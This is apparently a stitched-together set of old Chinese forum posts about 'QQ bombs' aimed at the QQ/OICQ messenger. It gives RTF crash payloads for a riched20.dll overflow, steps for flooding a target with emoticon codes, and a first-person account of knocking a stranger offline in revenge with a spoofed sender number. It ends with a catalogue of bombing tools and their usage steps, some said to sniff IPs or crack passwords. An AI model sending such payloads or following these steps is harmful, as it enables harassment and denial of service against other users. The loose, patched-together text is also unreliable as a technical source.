１．使用前提：对方使用的QQ必须是QQ2003III beta4版的，否则是无效的
　　攻击代码就在下面的括号中间，
　　()

２．漏洞描述：
riched20.dll中存在一个缓冲区溢出漏洞，该漏洞可导致使用此DLL模块相应功能的应用程序崩溃，但其很难被用来执行任意代码。
问题出现在其对RTF文档分析的代码中，其对文档中属性标示中的数字（如字体大小）等处理不当，使其出现溢出。
此溢出似乎不能导致执行任意代码。
下面一段RTF文档可能导致非法操作：
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0\fs18121111111111111111111111111111111110000www.coyoc.com\fs20\par
}
其中 \fs 是用来设置后面的文字 byebye 的字体大小的，当字体大小数字串长度超过32字节时，就会引发缓冲区溢出，当超过34字节以后就有可能会导致应用程序崩溃。
不但是\fs的设置中会出现这个问题，其他属性标示中的类似情况下也会出现同样的问题，例如下面一段RTL文档，同样会导致非法操作：
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222\fs180www.coyoc.com\fs20\par
}
更为可怕的是，目前很多软件包括国内最流行的既时通讯软件QQ(QQ2000c 0825 版本以后)都会受此漏洞影响，对方可以给你发送一个包含利用漏洞的
攻击消息，那你的QQ在查看对方的消息时会立即崩溃。
经测试，对YHAOOMESSAGE同样有效。

３．提交格式的错误
{\urtfl\ansi\街头黑客\QQ炸弹{\fonttblvhq{\f\fnil\自然因子\WWW.COYOC.COM;}}

４．本炸弹并非使用程序BUG

原创回复鼓励一下

QQ版本应为2003以上

１＞　先找个要炸的人　点收发通讯

２＞　点　语音／视频聊天　此时应该进入聊天模式　然后取消语音

３＞　点击　消息模式　［这时对方应该还在聊天模式］

４＞　将下面的代码尽可能多的发给那个衰崽

/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu
/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu/tu

要点

要多发

对方电脑不能特别好　例如　p4 3.2 + 512

主要是造成对方系统资源不足～！

好了　就这些了～　初了最后的方法以外　其它的方法在最新的QQ里已经不起作用了

祝大家晚安～

本人也是酷爱QQ的一族人,对于网上的好友向来来者不拒的,而且由于可能起名叫红叶,受到了相当一部分人的骚扰,当然有一些比较文明的人在知道身份之后(就是说谈到性别问题时候,告知男性),马上就没有话了,然后就再也不见其影踪,这是比较文明的人.还有一些就破口大骂,只好扔到黑名单中,不过被骂的多了就算是土人也有个脾气阿,决定对这类人进行制裁(其实就是报复,呵呵)

俗话说受人滴水之恩必当涌泉相报,我这个人受人滴水之仇也当涌泉相报(没办法,天歇座的,嘿嘿),于是想办法找了一个黑客的网站,进去一看好东东真的不少,什么搜捕,什么冰河(木马之典范,中文的)windows漏洞攻击,解码,加密解密,真是只有你想不到的没有他们做不到 的,grin,但是弱水三千,我只捡一瓢饮,马上就找到了我梦想中的oicqnuke,先下载,然后杀毒,安全第一,可不能自己被黑了.哈哈,报仇的时候到了!!!~~~~~

于是等着仇人上门(虽然一定不是上次骂我的人,但是也要给他点教训,嘿嘿,心够狠吧 !),没想到等着来人居然没人来了,faint(口吐白沫晕倒).等了两天终于有人送到枪口上了,我 已经忍了好久了,哈哈,等的就是你!当然我是有证据(就是他骂过我之后)才确定攻击目标的。

首先用ost(一个搜索oicq ip的软件,也要下载)查出它的ip,确定端口,然后我找了几条大话西游的经典对白,"曾经有一份真挚的感情摆在我的面前.....我希望是一万年"(咱报复也不能 用骂人的话呀,要讲究一点,呵呵,^_^)选择发送次数,毫不犹豫的写了个500(其实想写一万的 )怕机器受不了,把它的ip填好,端口也写好了,然后在冒充号码一栏填上了5678000,呵呵一个 全国的传呼台,然后我庄严的点了一下开火,哈哈接着就是等待了,过了几分钟,它的人头下去 了,哈哈,成功了,chat* ya(红叶做出胜利的手势!)

后来我试了各种情况,比方说在自己机器上再申请一个号,然后炸之,结果自己被炸了 ,损失惨重(所有的聊天纪录都被清空了,不知道是为什么),然后请在线的其他朋友申请新号, 有的成功了,有的没反映,初步统计是装有oicq消息过滤器的人是安全的.被炸的人也没什么损失,就是把oicq关了再打开就解决了,但是聊天纪录可能丢失.

最后劝告各位千万不要用这个东西开玩笑,虽然没有危险,但是感觉很不应该的.想用的人下载之后一定要记得杀毒.还有就是装个消息过滤器比较好的说,安全第一.呵呵,还有不要炸我啊!!!~~~~~~~

相信凡是上网的朋友都拥有一个或是多个QQ号，它给我们与朋友的联系带来了不少便利，但你有没有过被别人用QQ炸弹侵袭的经历呢？你是不是对此深恶痛绝呢？俗话说的好：知己知彼方能百战百胜。下面我们就来看看网上现在有哪些QQ炸弹呢？
所谓QQ炸弹，又称QQ消息攻击器，其大多数也是通过腾讯的服务器发送攻击消息的，它们和我们平常用QQ与好友们联系的过程都是一样的，但是其可以在短时间里向某一QQ号发送大量的、密集的垃圾信息，并且可以使被攻击方不能了解攻击方的QQ号码，达到攻击对方并隐藏自己的目的。现在QQ炸弹工具往往功能强大，并不仅仅只是具有炸弹的功能，其往往还同时具有端口扫描、查询IP地址、窃取密码、远程控制、隐藏自己QQ号码、查询好友是否在线等集成功能，所以现在已没有真正意义上的QQ炸弹了。本文介绍QQ炸弹的目的是为了使网又们了解，而并不希望网友用本文的介绍去干扰互联网的正常秩序，所以凡介绍的工具都没有提供下载网址，望网友们谅解！
*xOicq 4.2A 版本
xOicq 4.2A 版本 new 腾讯撤换服务器协议后，最新第一款相对应的OICQ查好友IP、炸弹（二合一工具）
使用步骤:
1.(适配器)选择'拨号适配器';
2.点击(探测),任何的oicq信息将被窃获,窃获对象的资料将显示在(在线名单)上;
3.选择对象,点击(添加攻击名单)后准备攻击;
4.点击(攻击),呵呵?好戏开始了!

*Oicq 4.1a 版本
使用步骤:
1.选择正确的适配器/[adaptor](如果使用modem,选Dial up Adaptor,如过使用网卡,则选相应的LAN card).
每次启动本软件时，请务必重复上一步骤，选定自己的网络适配器。否则本程序无法往下执行并死机！
2.点击“开始监测”/[Detect]按钮，任何的oicq信息将被窃获。对象的资料将显示在“在线名单”/[List on line]上。
3.选择对象,点击“加入攻击名单”/[add in attack]，准备攻击
4.点击“攻击”/[Attack]

*飘叶OICQ千夫指
飘叶OICQ千夫指也是一个发消息的工具,但多了不少新功能,可以冒充别人的QQ号发消息。也是现在为数不多的纯QQ炸弹。

*暴风雪
暴风雪填上IP和端口，然后--炸,非常厉害!
　
*Winsurf OICQ聊天圣手
Winsurf OICQ聊天圣手
1.新增了主机IP地址的显示。
2.新增了发送方式“发送到自定义窗口”
3.改进了消息攻击机制，增加了攻击时间限制，解决了攻击时的屏幕闪动，使用起来更加有效。
4.由于聊天圣手攻击时采用的方式是Oicq本身程序发送，对腾讯服务器和发送对方来说永远是有效的
5.适用于Oicq820 和 Oicq2000 版本 *OICQ MSGOICQ MSG
OICQ MSGOICQ MSG 一个专业OICQ炸弹，如别人打开了多个OICQ，可同时消息攻击他的所有OICQ程序。还具有在线破解OICQ密码，破解服务器发来的信息，假装离开、下线等功能!

*OICQ抛砖头 最新1.1版
OICQ抛砖头 最新1.1版最新支持了0820版本的OICQ,此工具可以不经对方通过验证就能给他发送消息。换言之就是说能够与佰生朋友交换消息,借此机会即可查到他的IP地址,对他作消息攻击!

*OICQ Send 2.02
OICQ Send 2.02 支持0820的OICQ消息炸弹“OicqSend”的最新版本，这个是不用注册的V2.02版本!
*Super Oicq
Oicq信息发送、号码探测器。不用开OICQ，用它就可以直接和OICQ用户交谈，还可以设定发送次数，当作OICQ炸弹使用。
　
*oicqbomber
oicqbomber顾名思义，又一个OICQ炸弹！可厉害了
1.已有个OICQNUKE了，现在又出了这个OICQBOMB，同一种程序，后者的作者显得大度多了，没有ZIP加密，功能也不作限制。
2.首先:目标必须有把你的OICQ号加入好友，且发讯给你，其图像出现在“陌生人”下；或者你把目标的OICQ号顺利加入你的好友(如目标有设置验证，你必须得到目标顺利验证)。
3.运行OICQ消息轰炸机(OICQBOMB)，在右边的“合法的OICQ号码”空白里填入有把目标加入你好友、对方也有把你加入好友的OICQ号码(也就是你现在所用的OICQ号码),点击“上线”的按钮。
4.填入目标的OICQ号，“发送方OICQ号码”后写说“(不要添自己的号码呦)”
是不正确的，选勾“随机”项也会使攻击失去作用，所以这项仍然填入你合法的OICQ号码。
5.“头像号码”随数字的不同头像图标显示不同。“线程数目”建议填10、20以上，我填100都运行得很正常，然后点击“装载多线程”的按钮。
6.“内容”填入你要让目标看到的话。“发送次数”建议填50、100......
最好“不限次数”。
7.“开始轰炸”!!!

*oicqsend
OICQ炸弹 使用方法十分简单，只要配合能查出好友IP地址的软件，把将要发送的OICQ朋友的IP地址和端口以及发送内容填入相应的格式内，按开始按钮即可信息轰炸对方的OICQ中，不需要自己的OICQ在线

*oicqspy
oicqspy非常好用的炸弹软件集攻防于一体
　
此外还有oicqnuke0.02、雪狐狸工具箱千禧版集成的“QICQ行刑官”等都是比较不错的攻击工具。